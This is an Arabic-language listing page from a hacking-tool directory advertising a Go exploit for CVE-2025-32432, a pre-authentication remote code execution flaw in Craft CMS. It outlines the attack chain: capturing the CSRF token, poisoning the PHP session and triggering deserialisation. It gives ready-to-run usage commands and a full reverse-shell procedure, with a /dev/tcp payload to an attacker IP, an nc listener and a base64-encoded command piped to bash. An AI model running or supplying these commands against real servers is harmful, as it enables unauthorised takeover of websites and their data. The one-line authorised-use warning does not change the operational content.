Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32432 — استغلال RCE قبل المصادقة لنظام Craft CMS بلغة Go. يلتقط رمز الجلسة/CSRF، يسمم جلسة PHP، ويطلق إلغاء التسلسل لتنفيذ الأوامر أو فتح قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/heltonpojo/cve-2025-32432
المصادقة والترخيصتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

استغلال RCE قبل المصادقة لنظام Craft CMS بلغة Go. يلتقط رمز الجلسة/CSRF، يسمم جلسة PHP، ويطلق إلغاء التسلسل لتنفيذ الأوامر أو فتح قشرة عكسية.

عرض المستودع
3منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32432 — RCE قبل المصادقة في Craft CMS

أداة استغلال لتنفيذ التعليمات البرمجية عن بُعد دون مصادقة في Craft CMS، مكتوبة بلغة Go.
مستوحاة من العمل الأصلي لـ c0gnit00.

كيف يعمل

  1. يحصل على جلسة PHP ورمز CSRF عبر GET /admin/login
  2. يسمّم ملف جلسة PHP بحقن كود PHP في سلسلة الاستعلام
  3. يطلق إلغاء التسلسل عبر assets/generate-transform لتضمين وتنفيذ الملف المسموم

الاستخدام

root@kitploit:~
go run main.go -u <url> -c <comando> 
الخيارالوصفإلزامي
-uعنوان الهدف (مثل: http://target.com)نعم
-cالأمر المراد تنفيذه (مثل: id, whoami)نعم

مثال

root@kitploit:~
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami

الصدفة العكسية

1. أنشئ الحمولة بتنسيق base64 مع عنوان IP والمنفذ الخاصين بك:

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. شغّل المستمع:

root@kitploit:~
nc -lvnp 4444

3. نفّذ أداة الاستغلال مع الحمولة:

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

استبدل قيمة base64 بتلك المولدة في الخطوة 1 باستخدام عنوان IP الحقيقي الخاص بك.

تحذير

للاستخدام الحصري في البيئات المصرّح بها واختبارات الأمان الخاضعة للرقابة.

تنزيل الأداة